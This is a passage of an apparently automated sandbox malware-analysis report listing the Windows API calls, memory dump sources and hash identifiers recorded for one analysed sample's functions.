                                                                    • Opcode Fuzzy Hash: 547d2714178258f336c0bd9d3aff238bd231589e63a4aa93254f011fc9ad791e
                                                                    • Instruction Fuzzy Hash: CDA24C70E04629CFDB24CF58D880AEDB7B2BF59314F2581A9D859AB390D7349E82DF50
                                                                    APIs
                                                                    • SetErrorMode.KERNEL32(00000001), ref: 0066E20D
                                                                    • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0066E267
                                                                    • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0066E2B4
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorMode$DiskFreeSpace
                                                                    • String ID:
                                                                    • API String ID: 1682464887-0
                                                                    • Opcode ID: 99111389826e7ca3f64d6e44724be569652d50650181a2c2dfb2ca0f1c3ed36f
                                                                    • Instruction ID: 921605801c6078027deaf68cd860c682707e5f570f16ba20fc23aa966a98abc5
                                                                    • Opcode Fuzzy Hash: 99111389826e7ca3f64d6e44724be569652d50650181a2c2dfb2ca0f1c3ed36f
                                                                    • Instruction Fuzzy Hash: 78216075A00618EFCB00EFA5D894AEDBBBAFF49310F0484A9E905A7351DB31A905CF54
                                                                    APIs
                                                                      • Part of subcall function 0063F4EA: std::exception::exception.LIBCMT ref: 0063F51E
                                                                      • Part of subcall function 0063F4EA: __CxxThrowException@8.LIBCMT ref: 0063F533
                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0065B180
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0065B1AD
                                                                    • GetLastError.KERNEL32 ref: 0065B1BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 1922334811-0
                                                                    • Opcode ID: 376ddf9365d0350b391bdd5b983ec1daca8be1692508a336567a372bc7ca0be6
                                                                    • Instruction ID: a6ddb06e895f89d4cd8065252a1b596652a45271df8f9d61551f74bb2d02ff74
                                                                    • Opcode Fuzzy Hash: 376ddf9365d0350b391bdd5b983ec1daca8be1692508a336567a372bc7ca0be6
                                                                    • Instruction Fuzzy Hash: 4711BCB2800604AFE728AF64DC85D6BB7AEEB44311F20852EE45697241DB70FC458BA0
                                                                    APIs
                                                                    • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00666623
                                                                    • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 00666664
                                                                    • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0066666F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: CloseControlCreateDeviceFileHandle
                                                                    • String ID:
                                                                    • API String ID: 33631002-0
                                                                    • Opcode ID: 2363f2a8dfbab8a9d65b3aca59e6c4a00c56212f15901ecb813d2978b52fc90d
                                                                    • Instruction ID: 22c94590567cf001855f5d010c2c748974d1fdaf985623bc6d07e989a20302df
                                                                    • Opcode Fuzzy Hash: 2363f2a8dfbab8a9d65b3aca59e6c4a00c56212f15901ecb813d2978b52fc90d
                                                                    • Instruction Fuzzy Hash: AE115E71E01228BFDB109FA4EC44BAEBBBDEB45B10F104156F900F6290D3B06E018BA1
                                                                    APIs
                                                                    • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00667223
                                                                    • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0066723A
                                                                    • FreeSid.ADVAPI32(?), ref: 0066724A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AllocateCheckFreeInitializeMembershipToken
                                                                    • String ID:
                                                                    • API String ID: 3429775523-0
                                                                    • Opcode ID: fe0a00d0c0de7abedfb2bed9af6b18a39fdcb64d6d857427dff0766f0ec4db84
                                                                    • Instruction ID: 9960f676c4abed2db6f1cf3120d4bbaedce5ab05e77121f15b5a039ea45203ba
                                                                    • Opcode Fuzzy Hash: fe0a00d0c0de7abedfb2bed9af6b18a39fdcb64d6d857427dff0766f0ec4db84
                                                                    • Instruction Fuzzy Hash: D4F01D76A04209BFDF04DFF4DD99AEEBBBDFF09205F105469A602E2591E370AA448B10
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 0066F599
                                                                    • FindClose.KERNEL32(00000000), ref: 0066F5C9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Find$CloseFileFirst
                                                                    • String ID:
                                                                    • API String ID: 2295610775-0
                                                                    • Opcode ID: 8cb0b5fbbcc36b3e8c88ad31a642f63cd50cf880a47b41f8ad24a7cc794dfd83
                                                                    • Instruction ID: b77fa68e950be6c179f08593002d5309caffeff3cabf292313b674536233adc4
                                                                    • Opcode Fuzzy Hash: 8cb0b5fbbcc36b3e8c88ad31a642f63cd50cf880a47b41f8ad24a7cc794dfd83
                                                                    • Instruction Fuzzy Hash: 381161716046019FDB10EF28D845A2EB7EAFF99324F00891EF8A6D7291DB30AD058B95
                                                                    APIs
                                                                    • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,0067BE6A,?,?,00000000,?), ref: 0066CEA7
                                                                    • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,0067BE6A,?,?,00000000,?), ref: 0066CEB9
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFormatLastMessage
                                                                    • String ID:
                                                                    • API String ID: 3479602957-0
                                                                    • Opcode ID: 461902a6242b5930500345b602fd336c9abaa4c1fb247c1af5c16fbba516347e
                                                                    • Instruction ID: 3e990db0d9d4c302d1aad6f7c987a465fc8dde27d34f7b092d5d4651ea2ba180
                                                                    • Opcode Fuzzy Hash: 461902a6242b5930500345b602fd336c9abaa4c1fb247c1af5c16fbba516347e
                                                                    • Instruction Fuzzy Hash: 2EF08231500329BBDB10ABA4DC49FFA777EBF09361F004165F955D6181D670AA40CFA0
                                                                    APIs
                                                                    • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00664153
                                                                    • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00664166
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: InputSendkeybd_event
                                                                    • String ID:
                                                                    • API String ID: 3536248340-0
                                                                    • Opcode ID: 728d6c75df76800295fbe397186693f34aeec905b10b739f67926171d2d7e567
                                                                    • Instruction ID: 857113c21731c2214032ce664ab00d597735a8dca1ceedd5f52f019ae22ecbdc
                                                                    • Opcode Fuzzy Hash: 728d6c75df76800295fbe397186693f34aeec905b10b739f67926171d2d7e567
                                                                    • Instruction Fuzzy Hash: 62F0677080024DAFDB059FA0C805BBEBBB1EF01305F00800AF966A6292D7799612DFA0
                                                                    APIs
                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,0065ACC0), ref: 0065AB99
                                                                    • CloseHandle.KERNEL32(?,?,0065ACC0), ref: 0065ABAB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustCloseHandlePrivilegesToken
                                                                    • String ID:
                                                                    • API String ID: 81990902-0
                                                                    • Opcode ID: fc39821fbdfc092f75cf569b88d383774a3075a4dd787627cd13ca571f2f8ba5
                                                                    • Instruction ID: 3a2c8a9380b95b447654a191531a8ceec377d38674e52fc87c7c53e4bc0b7c99
                                                                    • Opcode Fuzzy Hash: fc39821fbdfc092f75cf569b88d383774a3075a4dd787627cd13ca571f2f8ba5
                                                                    • Instruction Fuzzy Hash: 0FE0E675400510AFE7652F54EC05DB7BBEBEF05321F10852DF85B81870D7626C90DB94
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00646DB3,-0000031A,?,?,00000001), ref: 006481B1
                                                                    • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 006481BA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: e7b712d3f524be9bbd1d9998fd78565a13bbf595dd1c4abd799f1c7fd14408e4
                                                                    • Instruction ID: f80289f798d342a6a1e93043f2c583973289f5a172519efecd1dfbab86b0d9cd
                                                                    • Opcode Fuzzy Hash: e7b712d3f524be9bbd1d9998fd78565a13bbf595dd1c4abd799f1c7fd14408e4
                                                                    • Instruction Fuzzy Hash: E5B09231044608FBDF003BA1EC09B587F6AEB0B652F005010F60E848618B7264108F92
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 36a4d818598fd310a2e0b10631e53d7860a71f17329989567711a11fada8c3ee
                                                                    • Instruction ID: 2cb7f1dad1ab8753be05632085ebb6ba63ea75108a0aead342bcc1c116e28a93
                                                                    • Opcode Fuzzy Hash: 36a4d818598fd310a2e0b10631e53d7860a71f17329989567711a11fada8c3ee
                                                                    • Instruction Fuzzy Hash: A0320461D29F014DD7239634D872336A28AAFB73D4F15E737E81AB5AA6EB29C4C34100
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: __itow__swprintf
                                                                    • String ID:
                                                                    • API String ID: 674341424-0
                                                                    • Opcode ID: cdc93aa4c927006ee6f4c80e7e1877ef7f2da10502dc4338fd23ae517ac604dc
                                                                    • Instruction ID: b5acf4f97330fb645ef09183d5cf4def16013217000f19d2bbf05d6c126bae28
                                                                    • Opcode Fuzzy Hash: cdc93aa4c927006ee6f4c80e7e1877ef7f2da10502dc4338fd23ae517ac604dc
                                                                    • Instruction Fuzzy Hash: 7322BA715087119FDB24DF24D890BAFB7EAAF84310F10491DF89A8B291DB31E945CFA6
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 997b27585f924c7b41cb0eb7433dbbb17a7050c9584562c8844ec5497c5f2991
                                                                    • Instruction ID: 776b4b24e3902e89816fc94d30640f49f069424921c94f31b27d6f3d6d58cbf4
                                                                    • Opcode Fuzzy Hash: 997b27585f924c7b41cb0eb7433dbbb17a7050c9584562c8844ec5497c5f2991
                                                                    • Instruction Fuzzy Hash: 99B1AC60D2AF414DD763A6398831336B65DAFBB2D5B91E71BFC2B74D22EB2185C34180
                                                                    APIs
                                                                    • __time64.LIBCMT ref: 0066B6DF
                                                                      • Part of subcall function 0064344A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0066BDC3,00000000,?,?,?,?,0066BF70,00000000,?), ref: 00643453
                                                                      • Part of subcall function 0064344A: __aulldiv.LIBCMT ref: 00643473
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: Time$FileSystem__aulldiv__time64
                                                                    • String ID:
                                                                    • API String ID: 2893107130-0
                                                                    • Opcode ID: 1acf6a8bd2518ffa53fa0ceeddc6ba9ba0b907be01f37270db0d3323c43aa88a
                                                                    • Instruction ID: 8ed16cb65e658dc144e6b73e5c7f85ecaf839c6c872868a520afede1de862081
                                                                    • Opcode Fuzzy Hash: 1acf6a8bd2518ffa53fa0ceeddc6ba9ba0b907be01f37270db0d3323c43aa88a
                                                                    • Instruction Fuzzy Hash: CF217272634650CBC729CF28C881A92B7E2EB95310B249E6DE4E5CF2C0CB74BA45DB54
                                                                    APIs
                                                                    • BlockInput.USER32(00000001), ref: 00676ACA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: BlockInput
                                                                    • String ID:
                                                                    • API String ID: 3456056419-0
                                                                    • Opcode ID: ea2ca54ae963377c6ef3edf4daa312015c8f91794c2f8b01e8d0e20759a7dcda
                                                                    • Instruction ID: a0589f71a7cdb465dfba5eaefa8291dedd6382a7fd472f9e8bf229740e66a94d
                                                                    • Opcode Fuzzy Hash: ea2ca54ae963377c6ef3edf4daa312015c8f91794c2f8b01e8d0e20759a7dcda
                                                                    • Instruction Fuzzy Hash: E5E04835200214AFC740EF59D404D96B7EEAF74751F04D41AF94AD7351DAB0F8048BA0
                                                                    APIs
                                                                    • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 0066750A
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: mouse_event
                                                                    • String ID:
                                                                    • API String ID: 2434400541-0
                                                                    • Opcode ID: d2cc7c702b162d0202d69db8c19c591b7d9801744417d7f7176f4660e5891560
                                                                    • Instruction ID: 997bab1a592673c9abb0b3576d8212bed37ab9d04dc1c874d278d974b31cd8ac
                                                                    • Opcode Fuzzy Hash: d2cc7c702b162d0202d69db8c19c591b7d9801744417d7f7176f4660e5891560
                                                                    • Instruction Fuzzy Hash: DDD052A013C20438EC2987208C1FFFB0A8BF38078CFD4428AB203D92C0ECE86D02A070
                                                                    APIs
                                                                    • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,0065AD3E), ref: 0065B124
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: LogonUser
                                                                    • String ID:
                                                                    • API String ID: 1244722697-0
                                                                    • Opcode ID: c046b29492ad5e12840e0d4362c67e0cee9987e223fa2b6e9cec773a1b999de8
                                                                    • Instruction ID: 78dea7ed55ddd76531312b62c726cf5ae2ab6694a899fd0f3ede3dd2cf60c1ab
                                                                    • Opcode Fuzzy Hash: c046b29492ad5e12840e0d4362c67e0cee9987e223fa2b6e9cec773a1b999de8
                                                                    • Instruction Fuzzy Hash: 75D05E320A460EAEDF025FA4DC02EAE3F6AEB04700F408110FA12C50A0C671D531AF50
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: NameUser
                                                                    • String ID:
                                                                    • API String ID: 2645101109-0
                                                                    • Opcode ID: c79c4616a5c1e5d21b7feb2fe9ebf3dfdaf3922fae088235dd33e596bce483a1
                                                                    • Instruction ID: 41ff425b21b6369c008edcdc4be9d9280d82480c2046d4f90a06e559967991a1
                                                                    • Opcode Fuzzy Hash: c79c4616a5c1e5d21b7feb2fe9ebf3dfdaf3922fae088235dd33e596bce483a1
                                                                    • Instruction Fuzzy Hash: 8BC04CB1400109DFCB51DFC0C9449EEB7BDAB04305F105091A106F1510D7709B859F72
                                                                    APIs
                                                                    • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0064818F
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062988123.0000000000621000.00000020.00000001.01000000.00000003.sdmp, Offset: 00620000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062968514.0000000000620000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006AD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063035119.00000000006CE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063076387.00000000006DA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063096126.00000000006E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_620000_nfKqna8HuC.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFilterUnhandled
                                                                    • String ID:
                                                                    • API String ID: 3192549508-0
                                                                    • Opcode ID: de3792e979e69e9abad864af99ca9a672951abc99c49898bd8f8ed7b297300f6
                                                                    • Instruction ID: 7b061154f7443066ae4280db9de1e01bdb94eb552f6ed9cba916a27dec5fb24a
                                                                    • Opcode Fuzzy Hash: de3792e979e69e9abad864af99ca9a672951abc99c49898bd8f8ed7b297300f6
                                                                    • Instruction Fuzzy Hash: C0A0113000020CAB8F002B82EC088883F2EEA022A0B000020F80E808208B22A8208A82
